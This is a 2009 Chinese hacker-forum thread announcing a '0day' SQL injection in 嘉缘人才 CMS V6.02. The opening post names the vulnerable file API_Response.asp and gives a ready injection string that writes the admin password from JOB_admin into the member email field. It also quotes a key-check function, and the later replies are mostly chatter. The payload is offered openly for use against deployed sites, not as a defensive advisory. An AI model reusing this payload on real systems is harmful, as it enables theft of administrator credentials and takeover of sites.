黑客防线,在攻与防的对立统一中寻求突破!2001年创刊的黑客技术专业刊物!
plant

设为首页
收藏本站
联系我们
网站导航
黑客论坛 - 公共交流区 - 技术交流 - 原创技术 - 浏览 - 嘉缘人才cms系统最后一个注射漏洞?(0day)
        您是本贴第 309 位浏览者 本版版主

帖子主题: 嘉缘人才cms系统最后一个注射漏洞?(0day)

  • VIP技术支持
  • 等级: 铂金VIP
  • 发贴: 1566 贴
  • 货币: 99000000 金币
  • 积分: 47904 分
  • 经验: 19172 点
  • 体力: 271555 点
  • 注册: 2007-03-22
#1 浏览 VIP技术支持 的个人门户
嘉缘人才cms系统最后一个注射漏洞?(0day)
(警告:渗透测试版的漏洞请不要往外放,如果查出有人发布这里的东东。账户立即冻结)

给点面子,放漏洞偶容易么,等咱发布到脚本版的原创区你们转载手下留情别删版权被。

漏洞作者:幻泉[B.S.N]
漏洞来源:  http://www.hacker.com.cn
源码下载: 自己动手丰衣足食。
程序版本:嘉缘人才CMS系统V6.02(本人只测试了6.02,老版本大家自己测试吧。)
漏洞等级:高
漏洞说明:
/API/API_Response.asp

由于对ip没做过滤进行update操作导致出现注射漏洞。
如果access限制比较多。但是可以利用一下代码测试。
Code:
',Member_email=dFirst('JOB_pass','JOB_admin'),Member_url='aaa

这样就更新密码到email里了。

分析这个漏洞还需要对以下代码分析。
Code:
Function CheckSysKey(iName, iSysKey) ' username=huanquan   syskey
    If IsNull(iName) Or iName = "" Or IsNull(iSysKey) Or iSysKey = "" Then '如果都是空则结束调用
        CheckSysKey = False
        Exit Function
    End If
    If Len(iSysKey) = 32 Then '如果syskey长度是32则获取9-16位
        iSysKey = Mid(iSysKey, 9, 16)
    End If
    Dim strFRKey, strFRKeyNew
    strFRKey = Md5(iName&API_SysKey,16)   'baf588a6ba715854
    strFRKeyNew = Md5(iName&API_SysKey,16)  'baf588a6ba715854
    If LCase(iSysKey) = LCase(strFRKey) Or LCase(iSysKey) = LCase(strFRKeyNew) Then
        CheckSysKey = True
    Else
        CheckSysKey = False
    End If


我只介绍大概,漏洞利用代码都给了,大家可以自己看他的程序。
2009-7-7 19:49:35
  • 付天顺
  • 等级: 黑客防线技术团队
  • 发贴: 291 贴
  • 货币: 0 金币
  • 积分: 3021 分
  • 经验: 2324 点
  • 体力: 11495 点
  • 注册: 2007-09-01
#2 浏览 付天顺 的个人门户
Re:嘉园人才cms系统最后注射一个漏洞?(0day)
!!!!我这是第一个浏览者啊!!赶紧跟上...下个程序来看看。。。今天下午刚期末考试完第二天....
2009-7-7 19:58:17
  • hackertj
  • 等级: 钻石VIP
  • 发贴: 254 贴
  • 货币: 0 金币
  • 积分: 2701 分
  • 经验: 5353 点
  • 体力: 29055 点
  • 注册: 2007-10-16
#3 浏览 hackertj 的个人门户
Re:嘉园人才cms系统最后注射一个漏洞?(0day)
支持!下载研究中
        实力决定影响力
2009-7-9 11:06:02
  • applehdh
  • 等级: 钻石VIP
  • 发贴: 129 贴
  • 货币: 0 金币
  • 积分: 1933 分
  • 经验: 1521 点
  • 体力: 13755 点
  • 注册: 2006-07-30
#4 浏览 applehdh 的个人门户
Re:嘉缘人才cms系统最后注射一个漏洞?(0day)
Quote: 以下是引用 付天顺 于 2009-7-7 19:58:17 的发言
!!!!我这是第一个浏览者啊!!赶紧跟上...下个程序来看看。。。今天下午刚期末考试完第二天....

汗  你不是今年高考么?
牛人  山东实验中学的学生
人是梦  方是铁
2009-7-17 10:36:14
  • 锋行黑客
  • 等级: 钻石VIP
  • 发贴: 146 贴
  • 货币: 0 金币
  • 积分: 13416 分
  • 经验: 4388 点
  • 体力: 80695 点
  • 注册: 2006-03-22
#5 浏览 锋行黑客 的个人门户
Re:嘉缘人才cms系统最后一个注射漏洞?(0day)
偶也下过来看看。
奋斗ing……
2009-7-17 16:58:26
  • hack1986915
  • 等级: 金牌VIP
  • 发贴: 28 贴
  • 货币: 0 金币
  • 积分: 1098 分
  • 经验: 575 点
  • 体力: 7180 点
  • 注册: 2006-12-11
#6 浏览 hack1986915 的个人门户
Re:嘉缘人才cms系统最后一个注射漏洞?(0day)
呵呵,好东西当然要分享了!!!!!!!!!!!!!!
2009-7-27 14:50:08
  • cool_wxd
  • 等级: 黑客防线技术团队
  • 发贴: 4 贴
  • 货币: 0 金币
  • 积分: 336 分
  • 经验: 82 点
  • 体力: 1465 点
  • 注册: 2007-09-21
#7 浏览 cool_wxd 的个人门户
Re:嘉缘人才cms系统最后一个注射漏洞?(0day)
牛人~
不过不是最后一个注入漏洞哦~
2009-7-30 15:07:31
  • cool_wxd
  • 等级: 黑客防线技术团队
  • 发贴: 4 贴
  • 货币: 0 金币
  • 积分: 336 分
  • 经验: 82 点
  • 体力: 1465 点
  • 注册: 2007-09-21
#8 浏览 cool_wxd 的个人门户
Re:嘉缘人才cms系统最后一个注射漏洞?(0day)




在安天365论坛里看到这篇文章,在这里又看到了~呵呵~
只要是没有调用SQLin过程的页面,只要存在注入就可以注入的!
2009-7-30 15:10:52
  • VIP技术支持
  • 等级: 铂金VIP
  • 发贴: 1566 贴
  • 货币: 99000000 金币
  • 积分: 47904 分
  • 经验: 19172 点
  • 体力: 271555 点
  • 注册: 2007-03-22
#9 浏览 VIP技术支持 的个人门户
Re:嘉缘人才cms系统最后一个注射漏洞?(0day)
呵呵,我没看其他的,只是看看这个。
所以后面有问号。
看来他的漏洞还是不少的。
----------------------------
写的标题比较有私心,想让大家一起关注某些安全问题。
本贴已被 作者2009-7-30 16:36:0 编辑过
2009-7-30 15:43:09
9 1/1 1
 
 

版权所有 黑客防线 廊(公)备13100138000530号